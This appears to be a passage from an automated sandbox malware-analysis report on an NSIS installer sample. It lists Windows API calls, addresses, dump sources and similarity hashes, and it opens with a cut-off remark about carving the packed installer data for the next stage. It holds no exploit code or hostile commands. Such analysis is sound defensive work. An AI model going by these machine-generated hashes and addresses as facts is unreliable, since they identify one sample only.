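```

On a real sample, pass the file contents instead of build_sample(); the "offset" field is where the stub stops being generic NSIS code and the packed installer data starts, which is the region to carve for the next stage.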
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406110
                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                            • CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406124
                                            • CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406137
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction ID: 4a2c8b93f3f00ad1f037595bc6cc76d7c6216582d8143effd024cbcf063a8f89
                                            • Opcode Fuzzy Hash: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction Fuzzy Hash: 7B11B62684022295DB317B148C44AB7B6B8EF54790F56803FED96732C1E77C5CA286AD
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,0040A568,000000FF,00409D68,00000400,?,?,00000021), ref: 0040252F
                                            • lstrlenA.KERNEL32(00409D68,?,?,0040A568,000000FF,00409D68,00000400,?,?,00000021), ref: 00402536
                                            • WriteFile.KERNEL32(00000000,?,00409D68,00000000,?,?,00000000,00000011), ref: 00402568
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                            • String ID: 8
                                            • API String ID: 1453599865-4194326291
                                            • Opcode ID: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction ID: cff9808fb2b52db1cc78eea84bd95fecff25b82700627aa87d7ff40e926b01d0
                                            • Opcode Fuzzy Hash: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction Fuzzy Hash: D6019271A44204FBD710AFB09E8AEAB7278EF50319F20443BB102B61D1D2BC4E41DA2D
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                            • CompareFileTime.KERNEL32(-00000014,?,00409568,00409568,00000000,00000000,00409568,00435000,?,?,00000031), ref: 004017B8
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: 4cad66ebb848725ed1f6a1d034bc965b8891958e9da99df43a26388d092c07e4
                                            • Instruction ID: fea904f2e10d271746d0f20908cdf77902a72bdc4a53de11320a400de1336617
                                            • Opcode Fuzzy Hash: 4cad66ebb848725ed1f6a1d034bc965b8891958e9da99df43a26388d092c07e4
                                            • Instruction Fuzzy Hash: 62417271900514BACF11BBB5CC46DEF7679EF05368F20823BF425B11E2D63C8A519AAE
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction ID: a46f1669fd62fcddf5759aea02b57c8eb471e7750102af69c7615fdbe320007b
                                            • Opcode Fuzzy Hash: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction Fuzzy Hash: 58116A31904008FEEF219F90DE89EAE3B79EB54348F100476FA05B00A0D3B59E52EA69
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction ID: 1e99a2e3ee0d8cb2cc55cfcb97cc18e88a7bebe3fbcc68e996072587d9c1a701
                                            • Opcode Fuzzy Hash: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction Fuzzy Hash: 40F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B105466F601F5190C674AD018B35
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D44
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                            • CreateFontIndirectW.GDI32(0040BD70), ref: 00401DBC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: 0725d893e94fd174977a651e1a0823bcd351703a6bab7c79127cf0e71ae22114
                                            • Instruction ID: c56ae0944857913282fa576ad39b26dea61a7ac65424af38da9408b7f1c95b65
                                            • Opcode Fuzzy Hash: 0725d893e94fd174977a651e1a0823bcd351703a6bab7c79127cf0e71ae22114
                                            • Instruction Fuzzy Hash: A5018631984245AFE7016BB0AE0EB9A7F74EB65306F144479F981B62E2C77810059B7E
                                            APIs
                                            • lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                            • wsprintfW.USER32 ref: 00404927
                                            • SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 432158a3b12ceeb82141a1af4ebc204f328f8ec59d90b7a475c38da5306ce06a
                                            • Instruction ID: 30316ae283af339d029f00c0636502938e4caac6650f8f1893a4144cdcbf1ad5
                                            • Opcode Fuzzy Hash: 432158a3b12ceeb82141a1af4ebc204f328f8ec59d90b7a475c38da5306ce06a
                                            • Instruction Fuzzy Hash: E31127336041283BDB10666DDC46E9F328CEB81334F244637FA66F21D1E978CD1286E8
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction ID: 743da8294e509753cf54931ea2bb8f6bb49c191bc618b2a67718bc92c973a6dd
                                            • Opcode Fuzzy Hash: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction Fuzzy Hash: 76217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                            • lstrlenW.KERNEL32(0040A568,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 0fbadc1744dc08c75417c43921cc6175f7aa03adcc4a576a2966a08c4602771b
                                            • Instruction ID: dd6482d33bfca26aaa8e7f30057c56ab8fb8c99c6207a432b960756be4260044
                                            • Opcode Fuzzy Hash: 0fbadc1744dc08c75417c43921cc6175f7aa03adcc4a576a2966a08c4602771b
                                            • Instruction Fuzzy Hash: 441193B1A00108BEEB10EFA0DD49EAF777CEB50398F10403AF505B71D0D6B85D419B69
                                            APIs
                                              • Part of subcall function 0040590F: CharNextW.USER32(?,?,00424EB8,?,00405983,00424EB8,00424EB8,00436800,?,74DF3420,004056C1,?,00436800,74DF3420,00434000), ref: 0040591D
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 00405922
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 0040593A
                                            • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                            • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID:
                                            • API String ID: 3751793516-0
                                            • Opcode ID: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction ID: 262734717bc3bcf7a8c0ce33bb30a7f580439ac1f26dac51a327500c395ab635
                                            • Opcode Fuzzy Hash: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction Fuzzy Hash: 5411C671904104EBCF206FA0CD449AE77B1FF14369B34453BF881B61E1D23D49419A5D
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
                                            • Opcode ID: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction ID: bb6c5fc2a6f8d7f33e71238d936cb3f8bd62bfae150e474e5d39658e2f9f80dc
                                            • Opcode Fuzzy Hash: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction Fuzzy Hash: 65114871A00108BECB10DFA5C949DAEBBB9EF04344F20447AF905F62E1E7349E50CB28
                                            APIs
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                              • Part of subcall function 00405590: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                              • Part of subcall function 00405590: CloseHandle.KERNEL32(?), ref: 004055C6
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: aa209f3d0ae40418b41f7dd6e4627ec59dbf63cb5a4eead4ed69750ee996e8a6
                                            • Instruction ID: 80c30345ee18bbc14dd8b48d6273e75b475bc77ebba3550ac4fd2fc2a9fefb5a
                                            • Opcode Fuzzy Hash: aa209f3d0ae40418b41f7dd6e4627ec59dbf63cb5a4eead4ed69750ee996e8a6
                                            • Instruction Fuzzy Hash: 5A115E71910204EBCF109FA0CD859DE7AB5EB04355F24447BE501B62E1D2794992DB99
                                            APIs
                                            • DestroyWindow.USER32(?,00000000,00402EE5,00000001,?,?,?,00000000,00403455,?), ref: 00402D18
                                            • GetTickCount.KERNEL32 ref: 00402D36
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403455,?), ref: 00402D61
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction ID: 28aec9c9a202fe59f1d02261ac296c366856500da95e57c0d1cdd64ebec4d4f3
                                            • Opcode Fuzzy Hash: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction Fuzzy Hash: 30F05E30909235ABD6215B24FE4CD9B7FB9FB01B01B00447AF001B12E4D3B94C81CB9D
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405064
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004050B5
                                              • Part of subcall function 00404073: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction ID: 9c13ad67afaae448f0a4b319dcddee29e535cfa81e2793328e176173c0848073
                                            • Opcode Fuzzy Hash: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction Fuzzy Hash: D0017171500608AFDF205F11DD81A6F3666EB84354F108136FA04B91D1C77A9C52DFAE
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405AD2
                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,004031FD,00436000,00436800), ref: 00405AED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction ID: 8be7c4eca50f53f96d3bf9dd8d425998f061e8a75984e32c23608a8539937739
                                            • Opcode Fuzzy Hash: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction Fuzzy Hash: C0F09076B00204BBDB00CF5ADC45E9FBBBCEB95710F10803AEA00E7191E2B0AE40CB64
                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                            • CloseHandle.KERNEL32(?), ref: 004055C6
                                            Strings
                                            • Error launching installer, xrefs: 004055A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction ID: be1e6bbd108630f976ef7f5fcce94dc376a16e18e8587d411be4a41be08dbb4f
                                            • Opcode Fuzzy Hash: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction Fuzzy Hash: 46E0B6B4A05209BFEB109B64EC49F7B7BBDEB00704F908521BD15F2290D674A9148A79
                                            Memory Dump Source
